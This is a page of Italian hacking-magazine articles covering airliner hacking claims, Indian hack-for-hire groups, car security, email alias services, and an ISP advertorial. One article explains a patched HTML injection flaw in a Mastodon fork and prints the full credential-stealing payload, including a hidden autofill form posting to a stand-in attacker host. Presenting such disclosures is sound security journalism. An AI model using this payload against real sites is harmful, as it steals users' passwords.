Connect with us


Articoli

Ho hackerato un Jumbo jet

Avatar

Pubblicato

il

Hackerare un Jumbo jet

Bucare i controlli di un aereo di linea è difficile, ma non impossibile. E qualcuno dice di averlo già fatto…

Si può davvero hackerare un aereo di linea? In linea teorica sì. Finora però c’è una sola persona che ha sostenuto pubblicamente di averlo fatto: l’hacker americano Chris Roberts. A dir la verità ci sono molti dubbi sull’autenticità delle sue affermazioni (cosa doppiamente grave perché un hacker che mente sulle sue capacità e viene sgamato è bollato a vita), comunque bisogna prima spiegare chiaramente cosa si intende per hackerare un aereo di linea e naturalmente di quale particolare modello stiamo parlando.

Tripla sicurezza

Violare i sistemi un aereo di linea è molto meno semplice e lineare di quanto non si possa immaginare. E, se anche si riesce a trovare un punto di passaggio ed entrare fisicamente nella rete interna, bisogna avere chiaro con che cosa si ha a che fare. A differenza di altri tipi di sistemi, in un aereo di linea i propulsori, i sensori e gli attuatori sono ridondati e seguono una logica di funzionamento profondamente diversa, per esempio, da quella di un’automobile, di un camion o, mettiamo, di un treno o di una nave. Per esempio, i motori sono accoppiati e c’è un intero sottosistema digitale – ridondato tre volte – che lavora per mantenere la parità ed evitare che si possano disaccoppiare: è il Thrust Management Computer (TMC). Cercare di farlo funzionare al contrario, cioè per disaccoppiare i motori, richiederebbe di superare i suoi sistemi ridondati, il che è impossibile, perché sono costruiti apposta per entrare in funzione a cascata qualora uno dovesse fallire o mandare segnali sbagliati e quindi non mantenere accoppiata la potenza dei due motori. Ma c’è un altro problema, perché il TMC funziona in una sola direzione: compensa i disaccoppiamenti, ma non ha comandi per disaccoppiare i motori quando siano accoppiati. Occorrerebbe riprogrammare manualmente una dopo l’altra tutte le box preposte al mantenimento del sistema dei motori, per far loro fare cose che non sono previste.

La sfida di Roberts

Prendere il controllo di un aereo e cambiare la sua direzione, come sostiene di aver fatto nel 2015 Chris Roberts, hacker etico fondatore di One World Labs e appassionato di aerei, prevede la possibilità di mutare l’assetto e la direzione dell’apparecchio: farlo andare più piano o più veloce, farlo salire o scendere, oppure farlo virare. Riuscire a compiere una di queste operazioni senza avere il controllo completo della cabina di pilotaggio è praticamente impossibile per due motivi: i sistemi automatici sono costruiti per compensare e mantenere l’assetto preimpostato, mentre chi riuscisse a connettersi a uno dei sottosistemi potrebbe solo tentare di modificarne un parametro, che verrebbe automaticamente corretto. L’override, poi, è possibile solo da parte dei piloti in cabina, perché lavorano sui comandi centrali attuandoli fisicamente.
Roberts sostiene di aver hackerato un aereo di linea di United Airlines aprendo la scatola del sistema per l’intrattenimento di bordo (Seat Electronic Box, SEB) che su quel particolare modello si trovava sotto il sedile di fronte a lui. Roberts sostiene di averlo fatto in 15 voli diversi imparando ogni volta un po’ di più.

Roberts sostiene di aver provato per cinque anni a spiegare a Boeing e Airbus quali sono le vulnerabilità dei sistemi di bordo dei loro aerei, e poi aver deciso, durante un volo United Airlines tra Denver e Chicago del 15 aprile del 2015 su un 737-800, di fare qualcosa: far virare l’aereo. E lo ha twittato, venendo letto dagli uomini del Cyber Security Intelligence Department della United che l’hanno subito arrestato.

 

LEGGI L’ARTICOLO COMPLETO SU HJ NUMERO 222 CLICCA QUI O VAI IN EDICOLA!


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

[wpdevart_facebook_comment curent_url="http://developers.facebook.com/docs/plugins/comments/" order_type="social" title_text="Facebook Comment" title_text_color="#000000" title_text_font_size="22" title_text_font_famely="monospace" title_text_position="left" width="100%" bg_color="#d4d4d4" animation_effect="random" count_of_comments="7" ]

Articoli

Il mercato indiano dei cyber-mercenari

Furto di informazioni sensibili, sabotaggi e ricatti. Ecco come gli abilissimi informatici rimasti senza lavoro si sono riciclati come attaccanti, mettendo sottosopra la Rete

Avatar

Pubblicato

il

Prima, c’è stata la fine del mercato dell’outsourcing, l’esternalizzazione dei servizi IT di multinazionali americane ed europee verso aziende indiane, dove i programmatori sono molto bravi e costano meno dell’equivalente occidentale, poi l’esplosione dell’intelligenza artificiale, delle piattaforme cloud e dei servizi già strutturati di Google, Microsoft e AWS Amazon. Adesso è il turno dell’hack-for-hire, ovvero la possibilità di diventare cybermercenari, trasformarsi da white-hat e hacker etici in black-hat e hacker che attaccano per creare davvero dei danni e trafugare informazioni.

 

Attacchi  a “fin di male”

Il mercato indiano dell’hack-for-hire è diventato così una realtà, anche se, a tutt’oggi, è difficile quantificare l’entità di tale fenomeno. Sta di fatto che in India, come in altre parti del mondo, ci sarebbero individui o gruppi di individui che offrirebbero i loro servizi di hacking a terze parti per scopi illeciti, come il furto di informazioni sensibili o il sabotaggio di sistemi informatici. Tuttavia, non bisogna subito etichettare questi hacker indiani – che compiono attacchi a “fin di male” – come criminali che operano per forza illegalmente, e considerare il loro lavoro come un reato. Molti di questi gruppi, infatti, agirebbero da remoto per conto di aziende di servizi di consulenza per la sicurezza digitale, le quali, nondimeno, sarebbero solo una copertura per attacchi mirati su commissione. Attacchi di spionaggio industriale, sabotaggio, fino alla ricerca di prove di tradimenti o di soldi “imboscati” in divorzi e cause di separazione.

 

Secondo il Centro internazionale per gli studi e la strategia CSIS, l’hack-for-hire copre buona parte delle attività criminali online e supera l’1% del prodotto interno lordo mondiale.

 

Dove? A Gurugram!

Pare che nella cittadella della tecnologia di Gurugram, nello stato di Haryana, dove hanno sede tutti le grandi aziende come Google, Meta e Microsoft, alcune imprese di consulenza indiane facciano da copertura a un giro di cyber-mercenari che attaccherebbero privati cittadini in tutto il mondo con tariffe che vanno da poche centinaia a qualche migliaio di dollari. Sfonderebbero gli account Facebook e i backup di Android, scaricherebbero i dati, filtrerebbero la corrispondenza e le immagini alla ricerca di quello che il committente chiede. Una vera e propria industria dell’hack su richiesta, in pratica, perfetta per fidanzati gelosi, amanti traditi, dirigenti in cerca di vendetta contro colleghi scomodi, segreti industriali, piani marketing per prodotti ancora da lanciare. E dietro a tutto ciò non ci sarebbero gruppi hacker sconosciuti, come spesso avviene. Bensì aziende note, come BellTroX e Appin, che hanno una facciata “pulita” da consulenti, ma di nascosto fanno lavori online illegali grazie ai cybermercenari.

 

Secondo Google e gli altri

I ricercatori per la sicurezza del gruppo di Google distinguono questi gruppi di “hack-for-hire” dai fornitori di sorveglianza commerciale che vendono capacità tecniche. I gruppi, dicono, “conducono gli attacchi da soli”, hanno organigrammi ben definiti e, ovviamente, agiscono nell’illegalità più completa. Reuters, la famosa agenzia britannica, ha registrato alla fine del 2022, 75 attacchi mirati ad aziende e dirigenti europei e statunitensi. Ma ci sono anche attivisti dei diritti umani, giornalisti, magistrati e altre figure in possesso di importanti informazioni o bersaglio di campagne di odio. Tej Singh Rathore, un hacker indiano di 28 anni “passato al lato oscuro”, si è vantato con i giornalisti sotto copertura per un’altra inchiesta del Sunday Times, di aver violato più di 500 account di posta e di aver compromesso un migliaio di profili Facebook e Linkedin. Secondo l’uomo, “La Gran Bretagna e tutto il mondo oggi stanno usando gli hacker indiani”.

 

Attaccanti e vittime

Le violazioni compiute da questo tipo di cybercriminali, pare siano relativamente poche ma estremamente fruttuose. Non si tratterebbe di attacchi su misura (i più insidiosi, se ben condotti, visto che non mostrano i danni che fanno e sono spesso relativi alla cancellazione dei dati o alla richiesta di ransomware), ma di azioni che mirano a scoprire dei segreti e a entrare in possesso di informazioni riservate per conto di un committente che, solo successivamente, ne trarrà un vantaggio.

 

Appin e BellTroX?

Aziende come Appin, nata a New Delhi nel 2010 e bloccata dalle autorità pochi anni dopo, pare fosse il centro di sviluppo di questo tipo di attività. Sono aziende nate come normali società di investigazioni digitali o come aziende che si occupavano di cybersicurezza e sono diventate rapidamente dei “detective privati” al soldo di committenti senza scrupoli. Avrebbero fornito sottobanco servizi illegali e permesso per esempio la violazione di centinaia di sistemi pubblici e il furto di informazioni protette da segreto industriale. Appin è stata smascherata da alcuni esperti norvegesi di sicurezza ed è stata chiusa, anche se i suoi esperti si sono riciclati con altre aziende (forse per fornire gli stessi servizi?). BellTroX, invece, smascherata dai servizi americani che hanno cercato di arrestare il suo responsabile, Sumit Gupta, pare abbia violato più di diecimila account di posta e altrettanti account di Facebook. Meta ha cancellato i 400 account di BellTroX che sarebbero stati usati per tendere trappole agli utenti con richieste di amicizia necessarie alla parte di ingegneria sociale.

Gli attacchi dei cybermercenari provengono spesso da Paesi come Cina, Russia, Corea del Nord, Iran e India.

 

 

 

 


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Insicuri su quattro ruote

Con tremila chip di almeno 40 tipi diversi, le nuove auto sono sistemi digitali con una superficie di attacco enorme. E ovviamente c’è già chi se ne sta approfittando!

Avatar

Pubblicato

il

Le automobili sono vulnerabili a un cyberattacco da remoto? La risposta è sì, sempre più spesso. E non solo le auto elettriche che si presume siano dotate di sistemi informatici avanzati. Anche una moderna berlina, persino un’utilitaria può essere hackerata. Questo dipende dal fatto che ormai da più di venti anni i sistemi critici di un’automobile sono gestiti con dei microchip. Secondo una indagine del New York Times in una berlina ci sono circa tremila chip di 40 tipi diversi, dai microcontroller (tipo Arduino) a veri e propri processori. È una delle ragioni per cui durante la pandemia le case automobilistiche hanno avuto difficoltà con la produzione di veicoli: la scarsità dei processori made in China ha impattato soprattutto loro. Dal punto di vista di chi vuole hackerare un’auto, però, questa è una vera e propria fortuna.

 

Le marche più colpite

I diversi tipi di microcontroller e relativi firmware o sistemi più complessi offrono una montagna di opportunità per chi voglia sperimentare con tecniche inedite e capire come funzionino. Dopo un rapido studio la parte più facile da capire è che i chip utilizzati nel settore non vengono particolarmente curati dal punto di vista della prevenzione. Sono state identificate da un gruppo di hacker etici americani varie vulnerabilità di Ferrari, Bmw, Rolls Royce e Porsche. Ma i marchi sono molti di più, anche perché spesso le componenti sono riutilizzate da brand diversi. In particolare, spiega il ricercatore di cybersicurezza Sam Curry, è possibile accendere da remoto a vari modelli di Kia, Honda, Infiniti, Nissan e Acura. Oppure si possono controllare varie funzionalità delle Mercedes, delle Hyundai e delle Genesis.

Le auto di Elon Musk non hanno chiavi meccaniche o fili dell’accensione da mandare in corto per avviare il mezzo. Per aprirle, secondo il consulente per la sicurezza Sultan Qasim Khan, di Ncc Group, basta intercettare la comunicazione Bluetooth.

 

Sfondare i portali?

Non ci sono solo le vulnerabilità delle auto ma anche quelle dei sistemi gestionali delle aziende che le producono. Si possono anche, secondo altre fonti, violare i siti di BMW, Rolls Royce, Ferrari e Spireon prendendo il controllo degli account degli acquirenti di queste automobili, ricavare numero di telaio e di serie dei modelli comprati, creare account aziendali fasulli e fare modifiche, creare liste di accesso e modificare per esempio l’indicazione di chi ha comprato un particolare modello o pezzo di ricambio. Secondo Curry, anche Ford, Reviver, Porsche, Toyota, Jaguar e Land Rover hanno problematiche simili, che permettono se non altro di rivelare i nomi, gli indirizzi, la mail e il telefono dei clienti che hanno acquistato i veicoli negli ultimi anni.

 

Insicurezza di massa

L’automobile è uno dei sistemi di trasporto più utilizzato e diffuso al mondo. Si può accedere facilmente ai sistemi perché non cambiano dopo essere stati messi in commercio. Sono basati su versioni che non vengono mai patchate di Android per il sistema di infotainment o anche del VOS, il Vehicle Operating System che controlla il motore, la trasmissione e altre funzioni di guida dell’automobile. Con il passare del tempo le vulnerabilità vengono scoperte ma le auto, che hanno cicli di vita di dieci e più anni, non prevedono neanche la possibilità di aggiornamenti.

 

Entrare senza problemi

Il primo punto di insicurezza è l’apertura dell’auto quando questa avviene senza chiavi. In Germania su 237 modelli di auto che si aprono keyless, 230 possono essere aperti con un attacco di tipo relay, cioè registrando e ripetendo il segnale codificato. Ma ci sono anche gli attacchi che permettono di sfruttare le vulnerabilità dei sistemi interni e di controllare tutto: dal sistema di intrattenimento all’accensione sino all’impianto di climatizzazione. Questo dell’insicurezza delle auto moderne è uno dei problemi più grandi che, nei prossimi anni, peggiorerà sempre di più man mano che gli attuali, nuovi modelli, invecchieranno senza patch.

La nuova leva delle automobili che utilizzano sistemi operativi di guida autonoma usano DriveWorks, sviluppato da Nvidia, che fornisce anche l’hardware. Red Hat ha sviluppato il suo IVOS, In-Vehicle Operating System basato su Rhel, Red Hat Enteprise Linux. Google, Microsoft e Apple collaborano per creare una piattaforma comune di guida autonoma chiamata Mentor Nucleus OS.

 

Leggi anche: auto elettriche con il bug

 

 

 

 

 


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Una falla non Mastodon-tica

Una piccola falla nel filtro HTML di una istanza Mastodon permette l’iniezione di un form nascosto in un post, con cui rubare le credenziali degli utenti che lo visualizzano

Avatar

Pubblicato

il

Da quando Elon Musk ha acquistato il controllo di Twitter, e ha preso alcune decisioni molto controverse, questo social network ha visto una emorraggia di utenti, che si sono rifugiati su Mastodon. In effetti, Mastodon viene visto un po’ come una versione libera e open source a Twitter, nel senso che mantiene funzionalità simili. Se considerare Diaspora una alternativa FOSS a Facebook è improprio, perché la logica di base e le funzionalità sono differenti, si può dire che Mastodon sia davvero pensato con la stessa logica di interazioni sociali esistenti su Twitter. La sua natura open source, però, offre una serie importanti vantaggi, non ultima la possibilità di personalizzare la propria istanza. Questa “medaglia” ha, chiaramente, un rovescio: è possibile che il server che si sta utilizzando usi una versione di Mastodon differente da quella “ufficiale”, che può quindi nascondere falle e vulnerabilità sconosciute.

Un post malevolo, che riproduce la toolbar dei post di Mastodon e include il form nascosto (FONTE: https://portswigger.net)

Una federazione di server

Uno dei server Mastodon molto utilizzati da chi si occupa di informatica in generale, e di sicurezza informatica nello specifico, è infosec.exchange. Una caratteristica interessante di questo server è che offre la possibilità, nelle impostazioni utente, di abilitare i post in html. Questo significa che l’eventuale contenuto HTML di un post viene caricato nella pagina, interpretato dal browser, e visualizzato. Questo è un potenziale problema in termini di sicurezza perché implica che a un utente è permesso aggiungere componenti al DOM della pagina, e non dobbiamo dimenticare che poi sono i browser degli altri utenti a visualizzarlo, eseguendo tutto ciò che è previsto dall’HTML. Ma, chiaramente, non tutto l’HTML viene per nuocere: è un linguaggio di markup, si occupa più che altro di paragrafi, pulsanti, link e intestazioni. In linea di massima si potrebbe dire che finché si aggiungono elementi grafici sulla pagina non è un problema immediato. Il componente più pericoloso è l’elemento <script></script>, che infatti non è permesso. Il server Mastodon in questione ha infatti un filtro che elimina eventuali porzioni di Javascript inserite nei post. Tutto bene, quindi? Purtroppo no, perché Javascript non è l’unico modo per ottenere una esecuzione remota di codice direttamente nei pc degli utenti, pur essendo il più ovvio. Un metodo meno ovvio, ma spesso sufficientemente efficace, consiste nel farlo fare all’utente, nascondendo pulsanti e anche interi form in una pagina.

Il filtro per l’html, naturalmente, impedirebbe di inserire un form dentro un post Mastodon. Tuttavia, i post possono contenere degli attributi, e gli analisti hanno scoperto che il tag dedicato al titolo del post viene mantenuto così com’è. Infatti, questo codice:

<abbr title=”<img src=1 onerror=alert(1)>”>test</abbr>

Viene poi renderizzato nella pagina in questo modo, completamente intatto:

<abbr title=”<img src=1 onerror=alert(1)>”>test</abbr>

Come si può intuire, non è possibile usarlo per iniettare Javascript, ma si può usare per iniettare dell’html. Il “problema” è che il codice sarebbe all’interno del titolo, e non ha molto senso. Per poter iniettare qualcosa di realmente pericoloso, bisogna trovare un modo per uscire dal tag. Serve qualcosa che venga sostituito automaticamente, e che possa quindi sfuggire al filtro sull’html.

Per esempio, la scorciatoia

:verified:

Inserisce in un messaggio, titolo incluso, l’icona con la spunta blu tipica di un post “verificato”. Che si riduce a questo html:

<img draggable=”false” class=”emojione custom-emoji” alt=”:verified:” […] >

Facendo un tentativo, si nota che il codice apparentemente inutile

<abbr title=”<a href=’https://blah’>:verified:</a><iframe src=//garethheyes.co.uk/>”>

Diventa:

<abbr title=”<a href=’https://blah</a>’>
<img draggable=” false” … >
<iframe src=//garethheyes.co.uk/>

Quello che è successo è che il server ha inserito il tag img ma, così facendo, ha chiuso il tag precedente, rendendo quindi completamente autonomo il tag con l’iframe che altrimenti sarebbe apparso come testo. L’iframe viene quindi caricato, ed è teoricamente possibile integrare nella pagina porzioni di un altro sito web.

Non è comunque possibile integrare nella pagina altre risorse, come fogli di stile o script: i responsabili del server Mastodon hanno ovviamente previsto che qualcuno potesse cercare di integrare porzioni di pagine presenti su altri server, e hanno impedito questa cosa implementando delle Content Security Policies particolarmente stringenti. Non è infatti possibile fare riferimento a nessuna risorsa esterna al dominio infosec.exchange. Un form, però, può tranquillamente puntare a un’altro sito web. Si può quindi iniziare a scrivere un codice di questo tipo:

<abbr title=”<a href=’https://blah’>:verified:</a></abbr>

<form action=//pirata.it/rubapassword>

<input name=username >

<input type=password name=password >

Questo codice produrrebbe un classico form di login. Qual è il vantaggio, per un malintenzionato? Che i browser moderni, Google Chrome in particolare, hanno la funzione autofill attiva e riempiono automaticamente i campi, inserendo quindi nome utente e password dell’utente che sta visualizzando il post. Non avendo a disposizione javascript non si può attivare un invio automatico del form, però è possibile inserire un pulsante. Basta trovare un modo per camuffarlo e convincere l’utente stesso a cliccarci sopra. Una opzione consiste nel riprodurre la toolbar che appare sotto ad ogni post:

<div class=’status__action-bar’><button type=submit aria-label=’Reply’ title=’Reply’ class=’status__action-bar-button icon-button’ tabindex=’0′>

<i role=’img’ class=’fa fa-reply fa-fw’ aria-hidden=’true’></i>

 </button>

<button type=submit aria-label=’Boost’ aria-pressed=’false’ title=’Boost’ class=’status__action-bar-button icon-button’ tabindex=’0′ ><i role=’img’ class=’fa fa-retweet fa-fw’ aria-hidden=’true’></i>

 </button><button type=submit aria-label=’Favourite’ aria-pressed=’false’ title=’Favourite’ class=’status__action-bar-button star-icon icon-button’ tabindex=’0′><i role=’img’ class=’fa fa-star fa-fw’ aria-hidden=’true’></i>

</button><button type=submit aria-label=’Bookmark’ aria-pressed=’false’ title=’Bookmark’ class=’status__action-bar-button bookmark-icon icon-button’ tabindex=’0′>

<i role=’img’ class=’fa fa-bookmark fa-fw’ aria-hidden=’true’></i> </button>

<div class=’status__action-bar-dropdown’><button type=submit aria-label=’Menu’ title=’Menu’ class=’icon-button’ tabindex=’0′><i role=’img’ class=’fa fa-ellipsis-h fa-fw’ aria-hidden=’true’></i> </button></div>

</div>

“>

Nella action bar ci sono 5 pulsanti: Reply, Boost, Favourite, Bookmark, e Menu. Per riprodurli basta copiare il codice html dei veri pulsanti, tanto il loro aspetto dipende dai CSS che sono comunque già caricati nella pagina. Essendo perfettamente simile alla vera barra del post, è plausibile che più di qualche utente possa cliccarci sopra per sbaglio. L’unico passaggio che manca è nascondere i campi del form, altrimenti l’utente si rende perfettamente conto dell’inganno. Non si possono trasformare i campi in “hidden”, perché l’autofill dei browser non funzionerebbe. Però, almeno Chrome, funziona perfettamente se i campi non sono visibili a causa dello stile impostato nei CSS. La soluzione, per un malintenzionato, quindi, consiste nel cercare una classe, nei fogli di stile caricati naturalmente da Mastodon, che renda l’oggetto invisibile. Per esempio, la classe react-toggle-track-check ha l’opacità impostata a zero. Assegnando questa classe agli elementi input:

<input name=username class=react-toggle-track-check>

<input type=password name=password class=react-toggle-track-check>

Rimangono nella pagina pur essendo invisibili per l’utente, e vengono riempiti dall’autofill con i dati dell’utente. Quando l’utente clicca su uno dei pulsanti il form viene inviato al sito del malintenzionato, che quindi riceve le credenziali della vittima.

Cliccando su un pulsante il form viene inviato al server del malintenzionato, che quindi riceve in chiaro username e password della vittima (FONTE: https://portswigger.net)

Entità della vulnerabilità

Questa vulnerabilità è dovuta a una modifica presente sul server di infosec.exchange, quindi gli altri server Mastodon non sono necessariamente vulnerabili. E gli utenti di questo server sono in buona parte esperti di sicurezza, quindi è meno probabile che possano cadere nel phishing. È però anche vero che questo tipo di attacco potrebbe, teoricamente, essere applicato a altri server che contengano una modifica simile. Dipende infatti da alcune funzioni relative al supporto a markdown e html nei post presenti in Glitch-soc, un fork di Mastodon su cui si basa il server di infosec.exchange ma che altri potrebbero avere implementato sui propri server. Il problema, per un utente, è che non è facile capire se il server abbia questa vulnerabilità, e con l’improvviso aumento di utenti (e server) è facile che qualcuno finisca su un server che non è correttamente patchato.

La soluzione

I responsabili di Glitch-soc hanno corretto immediatamente il problema dopo la segnalazione, e i server di infosec.exchange sono ormai sicuri. La versione originale di Mastodon, invece, non è mai stata in pericolo, perché non supporta gli attributi title per i post. Più in generale, però, questo tipo di attacchi non potrebbe funzionare senza browser web che eseguono l’autofill su form che l’utente non riesce nemmeno a vedere. Purtroppo, non esistono estensioni per Google Chrome che disabilitino l’autocomplete temporaneamente, in modo da farlo funzionare solo quando l’utente lo desidera davvero. Su Firefox, invece, è necessario che l’utente porti almeno il focus sul form, prima che il browser cerchi di riempire i campi con le credenziali memorizzate.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Un provider Internet italiano e di gran qualità

Avatar

Pubblicato

il

By

Ehiweb, ISP italiano di gran qualità

Nella scelta di un provider Internet molto spesso si guarda come prima, e quasi unica, cosa al costo della connessione. Peccato che, non appena si verifica un problema, non tutti i provider, anche quelli molto noti, riescano a rimediare velocemente. Eppure esistono realtà italiane, decisamente più vicine alle necessità del cliente e in grado di fornire connessioni stabili e veloci, come Ehiweb.

Un supporto di qualità

Creata dall’azienda bolognese Ehinet nel 2004 (che nasce nello stesso anno), il brand Ehiweb è cresciuto negli anni in maniera costante e organica, aumentando la qualità e la quantità dei servizi ma con un punto fermo che è rimasto invariato: la cura nell’assistenza al cliente, o customer care per usare il termine inglese. In qualunque fase, dal primo contatto alla fase di attivazione o durante la risoluzione di un problema, l’assistenza clienti di Ehiweb si dimostra cordiale, veloce e competente. E non sono “parole”: chiunque può verificare di persona controllando, per esempio, l’opinione dei clienti su Trustpilot.

A questo possiamo aggiungere un aspetto fondamentale, che poche altre realtà riescono a offrire: la personalizzazione. Ogni cliente ha un referente personale a cui rivolgersi in caso di necessità o anche solo per conoscere le caratteristiche dei nuovi servizi. Insomma, con Ehiweb non esiste il classico “muro di gomma” che costringe l’utente a telefonare o contattare “n” volte l’operatore prima di ricevere il supporto richiesto, sentendosi comunque come “un numero” rimbalzato tra un operatore e un altro e con risposte che arrivano da call center sparsi per il mondo.

Etica al primo posto

Un altro punto di forza che caratterizza Ehiweb fin dall’inizio, e di cui godono sia gli utenti, sia gli impiegati dell’azienda stessa, e anche i fornitori che collaborano con il provider bolognese, è la lealtà e l’onesta. Questa idea di comportamento corretto si riverbera su vari elementi, oltre all’assistenza di cui abbiamo già scritto:

  • i costi per gli utenti, che sono sempre trasparenti e chiari, assolutamente privi di voci nascoste. Per fare un esempio, Ehiweb propone solo due tipi di promozioni – a sei mesi o per sempre – senza creare confusione in chi cerca un nuovo operatore e, soprattutto, rendendo chiaro il vantaggio economico nel tempo dell’offerta proposta.
  • libertà di scelta per i clienti. Il contratto con Ehiweb non ha vincoli di durata minima. Questo è uno dei motivi per cui spesso le persone hanno paura di cambiare provider. Inoltre, Ehiweb sposa a pieno la necessità del modem libero. Da sempre, infatti, sostiene la necessità di lasciare liberi i clienti di scegliere il loro modem, offrendo comunque di base dei dispositivi FRITZ!Box che sono di sicuro tra i migliori sul mercato.
  • il rapporto con i dipendenti. Oltre alle pratiche trasparenti verso i clienti, anche il rapporto etico con chi lavora in Ehiweb è un fattore radicato nell’azienda fin dal primo giorno. Questo ha contribuito a creare un ambiente di lavoro positivo e stimolante con spazi confortevoli in azienda, sia per quel che riguarda le postazioni operative sia per i momenti di relax durante e dopo il lavoro. Altri vantaggi per gli impiegati sono la preferenza di contratti a tempo indeterminato, l’assicurazione sanitaria aggiuntiva a quella prevista per legge, i buoni pasto e vari bonus, premi e incentivi.

ADSL, fibra, VoIP e anche mobile

L’offerta di connettività di Ehiweb copre ogni esigenza. Per quel che riguarda le connessioni cablate, si va dall’ADSL fino a 20 Mega, per chi è raggiunto solo dal doppino in rame, alle connessioni FTTC (miste rame-fibra) a 100 e 200 Mega. Sul sito di Ehiweb troviamo anche le connessioni FTTH a 1 Giga o a 2,5 Giga, attivabili anche sulla rete Open Fiber nelle località raggiunte. Sempre dal punto di vista della connettività, l’offerta aggiunta più di recente è quella relativa alle SIM per smartphone e tablet. Ehiweb Mobile è la nuova soluzione pensata per i privati, per il business e anche per l’IoT. Ehiweb si occupa di tutto anche nel caso di passaggio da un altro operatore, con prezzi davvero interessanti. Sono poi da citare anche i servizi Web: Ehiweb si occupa anche di gestione e registrazione domini, servizi di hosting e server virtuali su sistema operativo Linux che assicurano grandi prestazioni e uptime oltre il 99,95%. Infine, a completare l’offerta a 360 gradi, troviamo servizi VoIP, SMS e fax virtuale.


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Metti al sicuro la tua email

Cinque strumenti gratuiti da utilizzare per proteggere la vostra identità, la vostra privacy e i vostri sistemi di posta elettronica da spammer e spioni

Avatar

Pubblicato

il

Ci sono molti motivi per cui è importante nascondere il proprio indirizzo email da varie applicazioni e servizi Web di terze parti e anche proteggere la posta elettronica. Può capitare di creare account gratuiti con qualche servizio Web apparentemente interessante o di iscriversi a newsletter. È una pratica comune, ed è quello che fa la maggior parte delle persone. Se però si verificasse una violazione del database del servizio Web o della newsletter, il vostro indirizzo email potrebbe essere esposto a ogni tipo di truffatore e spammer. Database di indirizzi di questo tipo vengono costantemente venduti sul Dark Web da pirati informatici. In alcuni casi, inoltre, i siti raccolgono anche gli indirizzi email per inviare messaggi di spam. Alcuni utenti hanno indirizzi email dedicati a questo tipo di posta elettronica casuale, non di lavoro e non importante. Ma ci sono modi migliori per prevenire la spam: si possono utilizzare strumenti specializzati che forniscono indirizzi di posta elettronica fittizi da condividere con terzi. I messaggi inviati a essi vengono inoltrati al vostro indirizzo email reale, che non viene esposto a nessuno (se non allo strumento che state utilizzando). Volete smettere di ricevere email da determinate fonti? Potete bloccarle ancora prima che raggiungano la vostra casella di posta. Qui di seguito vedremo alcuni dei più interessanti strumenti Open Source che forniscono alias di posta elettronica per aiutarvi a nascondere il vostro vero indirizzo email oltre a un progetto di più ampio respiro per la protezione della privacy e della sicurezza della posta elettronica.

 

Il servizio di SimpleLogin

SimpleLogin è una soluzione Open Source che permette di generare alias di posta elettronica gratuitamente. Il servizio, la cui startup è stata acquisita lo scorso aprile da Proton (vedi oltre), ha anche implementato dei filtri anti-spam che rilevano automaticamente gli indirizzi e i contenuti dei messaggi di questo tipo e bloccano l’email forwarding per mantenere pulita la vostra casella di posta. Il piano gratuito vi consente di creare 10 alias (larghezza di banda illimitata) e di avere una casella di posta elettronica. Quindi se desiderate un numero illimitato di alias e la possibilità di aggiungere altri indirizzi email per la protezione, potete optare per il suo piano Premium che costa 30 dollari all’anno se pagate in una soluzione unica o 4 al mese fatturati mensilmente. È possibile accedere al servizio tramite il Web, un’estensione del browser (Chrome, Firefox e Safari) e applicazioni mobili (Android e iOS). Inoltre, potete fare self-hosting per avere il controllo totale degli alias di posta elettronica e avere la possibilità di personalizzare la vostra esperienza con il servizio.

Firefox Relay di Mozilla

Firefox Relay è un servizio gratuito con opzioni a pagamento diverse in base al Paese. Se si sceglie di usarlo è meglio abbinarlo a Firefox come browser Web per ottenere una perfetta integrazione ma è possibile utilizzarlo anche su browser basati su Chromium come Brave e Vivaldi. Avrete a disposizione gratuitamente cinque alias di posta elettronica. Otterrete inoltre l’estensione del browser per utilizzare Relay su qualsiasi sito e la rimozione degli elementi traccianti dalle email. Se si desidera avere un paio di alias di posta elettronica e che vengano reindirizzati alla propria casella, risulta una buona opzione. Si noti che non è disponibile alcuna app per dispositivi mobili quindi si può accedere al servizio solo utilizzando il browser mobile o l’estensione per il browser desktop. Per 0,99 € al mese con fatturazione annuale o 1,99 € pagando mensilmente, ottenete anche blocco delle email pubblicitarie e la possibilità di rispondere ai messaggi in modo anonimo. C’è anche un dominio Relay per creare alias di posta elettronica ovunque vi troviate, per esempio impostando un indirizzo come [email protected] quando siete fuori a cena. Negli USA e in Canada al servizio potete aggiungere la possibilità di creare alias per i numeri di telefono ma per ora questa opzione non è disponibile in Italia.

 

Le opzioni di AnonAddy

AnonAddy è una soluzione simile a SimpleLogin in termini di funzionalità di base disponibili. I piani tariffari potrebbero aiutarvi a scegliere uno dei due, considerando che AnonAddy gratuitamente fornisce alias standard illimitati con una larghezza di banda mensile di 10 MB. È anche possibile fare il self-hosting del servizio per una maggiore privacy. Consente inoltre di inserire le proprie chiavi pubbliche GPG/OpenPGP e di aggiungerle per ogni destinatario. Potete poi attivare o disattivare la crittografia. Quando è attiva, tutti i messaggi inoltrati vengono cifrati con la vostra chiave pubblica e solo voi sarete in grado di decifrarli con la chiave privata corrispondente. È inoltre possibile nascondere e crittografare l’oggetto dell’email, il che può essere utile se si utilizza Gmail o Outlook e si desidera evitare che la casella di posta possa essere spiata. AnonAddy offre anche estensioni del browser per Chrome e Firefox e client per l’utilizzo su dispositivi mobili (Android e iOS). Infine permette di gestire alias, destinatari, domini e nomi utente aggiuntivi utilizzando l’API AnonAddy.

 

DuckDuckGo Email Protection

Se utilizzate il browser DuckDuckGo potete approfittare del suo servizio di protezione delle email che vi permette di ottenere un alias di posta elettronica ([email protected]) da utilizzare per nascondere il vostro vero indirizzo. Ottenere la propria email @duck.com per proteggere la privacy è facile. Andate su questo sito, scegliete il vostro indirizzo unico e inserite l’email a cui volete che siano inoltrati i messaggi che vi arriveranno, dopo che saranno stati rimossi più tracker possibili. Email Protection è supportato dalle app DuckDuckGo per Android, Mac (beta) e iOS, nonché dalle estensioni di DuckDuckGo per Firefox, Chrome, Brave ed Edge. Sia le app sia le estensioni del browser rilevano automaticamente i campi per inserire il recapito di posta elettronica e consentono di riempire facilmente i moduli con il proprio indirizzo personale @duck.com o con uno privato del servizio generato in modo casuale, da utilizzare quando si pensa che un sito possa inviare spam o condividere le informazioni degli utenti.

 

ProtonMail e colleghi

